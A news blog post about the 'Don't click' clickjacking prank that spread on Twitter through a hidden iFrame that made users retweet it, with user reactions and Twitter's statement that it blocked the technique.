/>
X
Business

Twitter and the dangers of clickjacking

Right now -- yes, right now, as you're reading this post -- Twitter users are, well, a-twitter about an innocent but indicative joke that some clever person just played on half the Twitterverse.The trick?
Written by Andrew Nusca, Contributor

Right now -- yes, right now, as you're reading this post -- Twitter users are, well, a-twitter about an innocent but indicative joke that some clever person just played on half the Twitterverse.

The trick? A simple clickjacking maneuver, sent via a user to his or her followers, leading to a transparent iFrame positioned over a button that, when clicked by the victim, retweets the same message:

Instant-mania. Within an hour, everyone I follow was tweeting "What's going on?" and "I didn't do that!" and, soon enough, "Don't click 'don't click'."

Then guilt:

Here's the entire Twitterverse buzzing backlash already:

Two interesting phenomena to observe: First, how gullability on the part of the user can sweep through an instantaneous microblogging service such as Twitter more rapidly than an airborne pathogen; second, how quickly those people figure out the problem and alert their followers:

A rapid wave of destruction, followed by a rapid wave of aid.

I'm no security expert -- I'll leave that to ZDNet's Zero Day team -- but it appears to me that Twitter makes it very, very easy to suck a lot of users into a compromised situation very quickly. This example was innocuous; next time, it could be worse.

UPDATE: Twitter's on the case:

Some folks have noticed links from accounts they follow prefaced by the words, "Don't click" which of course people want to click right away. The links take you to a web site employing technique called clickjacking. This technique seeks to trick web users and can take action on your behalf while you perform seemingly unrelated tasks.

As wikipedia states, clickjacking is "A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function." In this case that "other function" was posting a link to your Twitter account so that more people could be tricked and the cycle could perpetuate.

Thankfully the harm was restricted to constant reposting of the link, but we take malicious attacks on Twitter users very seriously and this morning we submitted an update which blocks this clickjacking technique.

As a result, all the "Don't click" tweets have been removed from users' Twitter rivers. Gone -- just like magic. (You can still find some using Google cache, though.)

UPDATE 2/13: Looks like another clickjacking attempt!

Editorial standards